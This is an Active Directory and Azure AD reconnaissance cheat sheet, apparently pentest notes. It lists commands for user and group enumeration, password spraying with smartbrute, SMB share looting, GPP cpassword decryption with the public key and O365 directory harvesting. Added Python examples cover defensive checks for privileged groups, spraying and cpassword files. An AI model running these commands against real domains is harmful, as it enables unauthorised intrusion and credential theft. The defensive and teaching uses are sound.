Domain Recon

Tips

# Enumerate sessions
net session \\computer

Domain Properties

rpcclient

# You can use rpc to enumerate domain objects
rpcclient -U <user> <IP-DC>

rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> querygroupmem 0x200
rpcclient $> srvinfo
rpcclient $> querygroup 0x42
rpcclient $> queryuser 0x42
rpcclient $> getdompwinfo
rpcclient $> getusrdompwinfo 0x42
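
The enumdomusers, enumdomgroups and querygroupmem commands above print names and RIDs in a fixed `user:[name] rid:[0x..]` / `rid:[0x..] attr:[0x..]` form. The following is an added Python example (not part of the original notes or of rpcclient) that parses constructed sample output of that shape, resolves group member RIDs back to account names, and lists the accounts sitting in the well-known privileged groups (Domain Admins 0x200, Schema Admins 0x206, Enterprise Admins 0x207), which is the review a defender would run on a dump like this. The sample output, user names and group membership are constructed.

```python
import re

# Constructed sample output, formatted the way rpcclient prints the results of
# enumdomusers, enumdomgroups and querygroupmem. Not captured from a real domain.
ENUMDOMUSERS = """\
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[d.vador] rid:[0x450]
user:[svc_backup] rid:[0x451]
"""

ENUMDOMGROUPS = """\
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
"""

# Constructed output of `querygroupmem <rid>` for each group RID, one line per member.
QUERYGROUPMEM = {
    "0x200": "\trid:[0x1f4] attr:[0x7]\n\trid:[0x450] attr:[0x7]\n",
    "0x201": "\trid:[0x1f4] attr:[0x7]\n\trid:[0x1f5] attr:[0x7]\n"
             "\trid:[0x450] attr:[0x7]\n\trid:[0x451] attr:[0x7]\n",
    "0x206": "\trid:[0x1f4] attr:[0x7]\n",
    "0x207": "\trid:[0x1f4] attr:[0x7]\n\trid:[0x451] attr:[0x7]\n",
}

# Well-known RIDs of the highly privileged domain groups
# (Domain Admins 512, Schema Admins 518, Enterprise Admins 519).
PRIVILEGED_RIDS = {0x200, 0x206, 0x207}

OBJECT_RE = re.compile(r"^\s*(?:user|group):\[(?P<name>[^\]]*)\]\s+rid:\[(?P<rid>0x[0-9a-fA-F]+)\]")
MEMBER_RE = re.compile(r"rid:\[(?P<rid>0x[0-9a-fA-F]+)\]\s+attr:\[0x[0-9a-fA-F]+\]")


def parse_objects(output):
    """Map RID (int) -> name from enumdomusers / enumdomgroups output."""
    objects = {}
    for line in output.splitlines():
        match = OBJECT_RE.match(line)
        if match:
            objects[int(match.group("rid"), 16)] = match.group("name")
    return objects


def parse_members(output):
    """List of member RIDs (int) from querygroupmem output."""
    return [int(m.group("rid"), 16) for m in MEMBER_RE.finditer(output)]


def resolve_memberships(users, groups, membership):
    """Return {group name: [member names]} with member RIDs resolved to user names."""
    resolved = {}
    for rid_hex, output in membership.items():
        rid = int(rid_hex, 16)
        group_name = groups.get(rid, f"rid {rid:#x}")
        resolved[group_name] = [users.get(r, f"rid {r:#x}") for r in parse_members(output)]
    return resolved


def privileged_accounts(users, groups, membership):
    """Sorted list of account names that are members of any privileged group."""
    accounts = set()
    for rid_hex, output in membership.items():
        if int(rid_hex, 16) in PRIVILEGED_RIDS:
            accounts.update(users.get(r, f"rid {r:#x}") for r in parse_members(output))
    return sorted(accounts)


if __name__ == "__main__":
    users = parse_objects(ENUMDOMUSERS)
    groups = parse_objects(ENUMDOMGROUPS)
    for group, members in resolve_memberships(users, groups, QUERYGROUPMEM).items():
        print(f"{group}: {', '.join(members)}")
    print("privileged accounts:", privileged_accounts(users, groups, QUERYGROUPMEM))
```

Feed it the saved output of the three rpcclient commands and compare the privileged-account list against what the directory is supposed to contain; a service account such as `svc_backup` in Enterprise Admins is the kind of finding this surfaces.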

enum4linux

# You can use enum4linux to enumerate domain users
# You can try anonymous binding
sudo enum4linux domaine.fr
./enum4linux.pl -R 1090-1200

# When using authenticated users, you need to provide options for enumeration
$ enum4linux -a -u "DOMAIN\\user" -p "pass" xx.xx.xx.xx
# enum4linux-ng is a rewrite of the official tool (python3)
# adding some features like colors and parsing
https://github.com/cddmp/enum4linux-ng

windapsearch

# windapsearch is also a very good tool to perform automated LDAP queries
# Enumerate users
./windapsearch.py -d lab.ropnop.com -u ropnop\\ldapbind -p GoCubs16 -U
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -U

# enumerate all entries in objectCategory=group
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -G

# Query group membership
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -m <CN/OU>

# Enumerate all domain admins and people having equivalent rights
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 --da

# Enumerate all computers
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -C

# Custom search
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -s <stringToSearch>

Pywerview

python pywerview.py get-netuser -w GALACTIC.LAN -u d.traya --dc-ip 192.168.56.103 --username d.traya
python pywerview.py get-netgroup -w GALACTIC.LAN -u d.traya --dc-ip 192.168.56.103 --username d.vador

Built-in functions

https://twitter.com/NinjaParanoid/status/1407137264283504640/photo/1

# You can use [adsisearcher] to enumerate AD objects
# Example: users whose password never expires (userAccountControl bit 65536 = DONT_EXPIRE_PASSWORD)
PS> ([adsisearcher]"(&(objectcategory=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))").findAll()

Users and Passwords

Smartbrute

https://github.com/ShutdownRepo/smartbrute
# The smart password spraying and bruteforcing tool for Active Directory Domain Services.

# Smart mode
# This mode can be used to make sure NOT to lock any account when bruteforcing by:
# Fetching the enabled users from Active Directory
# Fetching bad password count for each user
# Fetching lockout policies
# Bruteforcing users according to the information found
smartbrute.py -v smart -bP passwords.txt ntlm -d domain.local -u user -p password kerberos

# Brute mode
# The brute mode doesn't require prior knowledge of low-priv user credentials but doesn't
# have the safety features of the smart mode. This mode CAN effectively lock accounts
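
The smart mode described above stays under the lockout threshold per account by spreading attempts across many users, which is exactly why per-account lockout counters are not a detection for spraying. The following is an added Python example (not part of the original notes or of smartbrute) that runs two checks over a constructed failed-logon log: which accounts reached the lockout threshold inside the observation window, and which source addresses failed logons for many distinct accounts inside that window. The log format (`timestamp status user source`), the lockout threshold of 5 in a 30-minute window, and the 10-distinct-users spray threshold are assumptions for the example, not values from the page.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOCKOUT_THRESHOLD = 5                        # assumed: failed attempts before lockout
OBSERVATION_WINDOW = timedelta(minutes=30)   # assumed: lockout observation window
SPRAY_MIN_USERS = 10                         # assumed: distinct accounts per source = spray

# Simplified line format, loosely modelled on a failed-logon event.
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<status>FAIL|OK) (?P<user>\S+) (?P<src>\S+)$")


def constructed_log():
    """Build a constructed log (not real data).

    One source tries two passwords against twelve accounts, keeping every
    account under the lockout threshold; one user mistypes her password six times.
    """
    lines = []
    base = datetime(2024, 5, 1, 9, 0, 0)
    users = [f"user{i:02d}" for i in range(12)]
    for round_no in (0, 1):  # two spray rounds, 20 minutes apart
        for i, user in enumerate(users):
            ts = base + timedelta(minutes=20 * round_no + i)
            lines.append(f"{ts.isoformat()} FAIL {user} 10.0.0.5")
    for i in range(6):  # carol fails six times in ten minutes from her own workstation
        ts = base + timedelta(minutes=2 * i)
        lines.append(f"{ts.isoformat()} FAIL carol 10.0.0.9")
    return "\n".join(lines)


def parse_events(log):
    """Parse log lines into sorted (timestamp, status, user, source) tuples."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["status"], m["user"], m["src"]))
    return sorted(events)


def users_at_lockout_risk(events, threshold=LOCKOUT_THRESHOLD, window=OBSERVATION_WINDOW):
    """Accounts whose failures inside one observation window reached the lockout threshold."""
    failures = defaultdict(list)
    for ts, status, user, _ in events:
        if status == "FAIL":
            failures[user].append(ts)
    risky = []
    for user, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over this user's failures
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                risky.append(user)
                break
    return sorted(risky)


def spray_sources(events, min_users=SPRAY_MIN_USERS, window=OBSERVATION_WINDOW):
    """Sources that failed logons for at least min_users distinct accounts within one window."""
    by_src = defaultdict(list)
    for ts, status, user, src in events:
        if status == "FAIL":
            by_src[src].append((ts, user))
    flagged = {}
    for src, items in by_src.items():
        best = 0
        for i, (start_ts, _) in enumerate(items):   # window starting at each failure
            distinct = set()
            for ts, user in items[i:]:
                if ts - start_ts > window:
                    break
                distinct.add(user)
            best = max(best, len(distinct))
        if best >= min_users:
            flagged[src] = best
    return flagged


if __name__ == "__main__":
    events = parse_events(constructed_log())
    print("lockout risk:", users_at_lockout_risk(events))
    print("spray sources:", spray_sources(events))
```

On the constructed log the per-account check only flags `carol`, while the per-source check flags `10.0.0.5` with 12 distinct accounts; the spray itself never trips a lockout, so a detection that keys on lockouts alone misses it.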

SMB & Share

Basic enumeration

# Enumerate hostname
nmblookup -A <victim_ip>
enum4linux -n <victim_ip>
$ nmap --script=smb-enum* --script-args=unsafe=1 -T5 <victim_ip>

# Check for null sessions
smbmap -H <victim_ip>

# Checking for vulns
nmap --script smb-vuln* -p139,445 -T4 -Pn <victim_ip>

Smbclient

# Using smbclient
smbclient -L <IP>
smbclient -U GALACTIC.LAN\\d.vador -L //10.69.88.10

# You can recursively download a folder
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

SYSVOL & MS14-025

# You can browse SMB share using smbclient
# The SYSVOL share contains GPO, you can look for a MS14-025
smbclient -U user //10.34.67.4/SYSVOL

# Instead of connecting to SYSVOL remotely and searching manually
# you can mount it locally and grep for information
# FASTER!
sudo mount -t cifs -o username=domainUser,domain=domain.com //IP/SYSVOL /mnt/sysvol
# MS14-025: look for cpassword attributes in Group Policy Preferences XML files, e.g.
→ smb: \NORZH.LAN\Policies\{195471B6-B0C6-4AD2-9853-28E2B4E9CEF6}\Machine\Preferences\Groups\Groups.xml
→ gpp-decrypt <cpassword value from Groups.xml>

# The following tool handles both decryption and encryption of GPP cpassword values
https://github.com/lucasko/gpp-encrypt-decrypt
# If you ever need to recreate this vulnerability
# You can encrypt a password using the following
https://gchq.github.io/CyberChef/#recipe=AES_Encrypt(%7B'option':'Hex','string':'4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'%7D,%7B'option':'Hex','string':'0000000000000000000000000000000'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D)To_Base64('A-Za-z0-9%2B/%3D')&input=cGFzcw
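
Once SYSVOL is mounted, the practical check is whether any Group Policy Preferences file still carries a cpassword attribute (the MS14-025 condition). The following is an added Python example (not part of the original notes or of any tool the page links) that builds a constructed SYSVOL-like tree in a temporary directory and walks it, reporting the GPO GUID, file, element and target account for every element with a cpassword. The GPO GUIDs, the XML fragments and the `PLACEHOLDER_CPASSWORD` value are constructed; the list of preference file names and account attributes is an assumption covering the common Preferences types.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Group Policy Preferences files that may carry a cpassword attribute (assumed list).
PREFERENCE_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
                    "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attributes that name the account a stored password belongs to, by file type (assumed).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")
GUID_RE = re.compile(r"\{[0-9A-Fa-f-]{36}\}")

# Constructed GPO GUIDs and XML fragments; the cpassword value is a placeholder,
# not an encrypted credential.
GPO_WITH_CPASSWORD = "{00000000-0000-0000-0000-000000000001}"
GPO_CLEAN = "{00000000-0000-0000-0000-000000000002}"

GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="LocalAdmin" changed="2014-01-01 10:00:00">
    <Properties action="U" userName="LocalAdmin" cpassword="PLACEHOLDER_CPASSWORD" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"/>
  </User>
</Groups>
"""

DRIVES_XML = """<?xml version="1.0" encoding="utf-8"?>
<Drives clsid="{8FDDCC1A-0C3C-43cd-A6B4-71A6DF20DA8C}">
  <Drive clsid="{935D1B74-9CB8-4e3c-9914-7DD559B7A417}" name="H:">
    <Properties action="U" path="\\\\fileserver\\home" label="Home" useLetter="1" letter="H"/>
  </Drive>
</Drives>
"""


def build_sample_sysvol():
    """Write the constructed fragments into a temporary SYSVOL-like tree; return its root."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    for gpo, sub, name, xml in (
        (GPO_WITH_CPASSWORD, "Groups", "Groups.xml", GROUPS_XML),
        (GPO_CLEAN, "Drives", "Drives.xml", DRIVES_XML),
    ):
        d = os.path.join(root, "domain.local", "Policies", gpo, "Machine", "Preferences", sub)
        os.makedirs(d)
        with open(os.path.join(d, name), "w", encoding="utf-8") as fh:
            fh.write(xml)
    return root


def find_cpasswords(sysvol_root):
    """Walk a SYSVOL tree and report every preference element that carries a cpassword."""
    findings = []
    for dirpath, _, files in os.walk(sysvol_root):
        for fname in files:
            if fname not in PREFERENCE_FILES:
                continue
            path = os.path.join(dirpath, fname)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # malformed XML deserves a look, but is not a cpassword finding
            guid = GUID_RE.search(path)  # the GPO GUID is a directory name under Policies
            for elem in tree.getroot().iter():
                if elem.attrib.get("cpassword"):
                    account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), None)
                    findings.append({
                        "gpo": guid.group(0) if guid else None,
                        "file": os.path.relpath(path, sysvol_root),
                        "element": elem.tag,
                        "account": account,
                    })
    return findings


if __name__ == "__main__":
    for finding in find_cpasswords(build_sample_sysvol()):
        print(finding)
```

Point `find_cpasswords()` at the mount point used above (e.g. `/mnt/sysvol`) instead of the constructed tree; every hit is a policy whose stored credential should be removed and rotated, since the decryption key is public.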

CrackMapExec & Impacket

# Impacket SMB/MSRPC tools
# lookupsids → SID Bruteforce through MSRPC Interface
# samrdump → SAM Remote Interface (MSRPC) to extract system users, available share etc.
# services → Used to (start, stop, delete, status, config, list, create, change) services through MSRPC interface
# netview → Get a list of opened sessions and keep track of who logged in/off on remote targets
# smbclient → generic SMB client
# rpcdump → This script will dump the list of RPC endpoints and string bindings registered at the target.
# reg → Remote registry manipulation tool through the [MS-RRP] MSRPC Interface.
tool.py domain\user:password@IP <command/parameter>

# You can list all shares on a machine to find potential entry points
cme smb 10.69.88.23 -u user -p password --shares

Defensive

# DEFENSIVE POINT OF VIEW
# You can list active SMB sessions
C:\> net session
# And kill them
C:\> net session \\[IPaddr] /del

DNS zones

https://github.com/dirkjanm/adidnsdump
https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/

# By default any user in Active Directory can enumerate all DNS records in the Domain 
# or Forest DNS zones, similar to a zone transfer. 
# This tool enables enumeration and exporting of all DNS records in the zone for 
# recon purposes of internal networks.

# Get DNS zones
$ adidnsdump -u icorp\\testuser --print-zones icorp-dc.internal.corp

# Get zone content
$ adidnsdump -u icorp\\testuser --zone zonename icorp-dc.internal.corp

Azure AD Recon

# Applications using Azure API Management expose endpoints under these hostnames
# Requests are made to
<name>.azure-api.net

# Documentation and more
<name>.portal.azure-api.net

# Gateway
<name>.azure-api.net

# Dev
<name>.portal.azure-api.net
<name>.developer.azure-api.net

# Management
<name>.management.azure-api.net

# Git
<name>.scm.azure-api.net
https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html

# Tool o365recon can be used (https://github.com/nyxgeek/o365recon)
# It mainly uses MS Online Powershell module

PS> Connect-MsolService
PS> powershell -ep bypass .\o365recon.ps1 -outputfile TEST_OUTPUT

# The -users_detailed flag can be used in order to query more information about users
# LastDirSyncTime empty == the user only exists in the cloud

# The id suffixed to the SYNC cloud account == the id of the MSOL account belonging to the on-premises Active Directory

# You can also list Azure AD roles and members (see the link above)

# MailSniper can also be used to get the Address List
PS C:\> Get-GlobalAddressList -ExchHostname outlook.office365.com -UserName xxxx -Password xxxx -OutFile xxxx

# And associated usernames
PS C:\> Get-ADUsernameFromEWS -EmailList list.txt -ExchHostname outlook.office365.com -Remote
# C# Module for Azure AD enumeration
https://twitter.com/benpturner/status/1384595006917431301?s=19
https://gist.github.com/benpturner/c7376718558bb118111c7cad651a25ce
# When having admin privileges you can check the MFA status of users
PS C:\> Connect-MsolService
PS C:\> Get-MsolUser -EnabledFilter EnabledOnly -MaxResults 50000 | select DisplayName,UserPrincipalName,@{N="MFA Status"; E={ if( $_.StrongAuthenticationRequirements.State -ne $null){ $_.StrongAuthenticationRequirements.State} else { "Disabled"}}} | export-csv mfaresults.csv
# ROADTools (https://github.com/dirkjanm/ROADtools)
# It uses an internal undocumented version of the Microsoft Graph API

PS C:\> roadrecon.exe auth -u user@domain
Tokens were written to .roadtools_auth

PS C:\> roadrecon.exe dump

PS C:\> roadrecon-gui.exe -debug -d .\roadrecon.db
 * Serving Flask app "roadtools.roadrecon.server" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

# Plugin for getting Conditional Access Policies
PS C:\> roadrecon plugin policies